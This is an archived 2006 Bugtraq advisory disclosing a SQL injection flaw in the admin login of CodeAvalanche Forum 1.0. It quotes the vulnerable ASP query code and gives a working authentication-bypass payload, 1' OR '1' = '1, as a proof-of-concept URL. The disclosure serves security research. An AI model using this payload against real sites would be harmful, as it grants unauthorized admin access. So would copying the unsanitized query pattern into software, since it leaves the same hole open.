lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [day] [month] [year] [list] 
Date: 1 Jun 2006 17:09:10 -0000
From: omnipresent@...il.it
To: bugtraq@...urityfocus.com
Subject: CA Forum Remote SQL Injection


------------------------------------------------------------------
               - CAForum 1.0 Remote SQL Injection -
   -= http://colander.altervista.org/advisory/CAForum.txt =-
------------------------------------------------------------------

	    -= CodeAvalanche Forum Version 1.0 =-



Omnipresent
june 01, 2006


Vunerability(s):
----------------
SQL Injection



Product:
--------
CodeAvalanche Forum Version 1.0

Vendor:
--------
http://www.truecontent.info/codeavalanche/asp-forum-script.php


Description of product:
-----------------------

CodeAvalanche FreeForum is asp forum application which allows free posting, there is no needs for registration of your
visitors. Administrator can add unlimited number of forum categories.


Vulnerability / Exploit:
------------------------

In the file default.asp in Admin directory is vulnerable to an Remote SQL Injection Attack.
A malicious people can gain Admin rights by putting rights parameters in the Password Variable.

Let's Check the source code:

<% Response.Buffer = True 


userLogged=false
If Request("Password")<>"" Then 
'response.Write(Request("Password")) 
'response.flush

dim rsUser,selectSQL
selectSQL="SELECT * FROM PARAMS where PASSWORD='" & Request("Password") & "'"


[...]



[End default.asp]

As you can see the variable Password is not properly sanitized before be used, so an attacker can put this string in the
password field:


1' OR '1' = '1

So, the query will be:

selectSQL="SELECT * FROM PARAMS where PASSWORD='1' OR '1' = '1'


And you can gain access to the application with admin rights.


PoC / Proof of Concept of SQL Injection:
----------------------------------------

This is a simple Proof Of Concept used on my local machine:


http://127.0.0.1/[Application_Path]/[CAForum]/admin/default.asp?password=1'%20OR%20'1'%20=%20'1


Vendor Status
-------------

Not informed!

Credits:
--------
omnipresent
omnipresent@...il.it

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ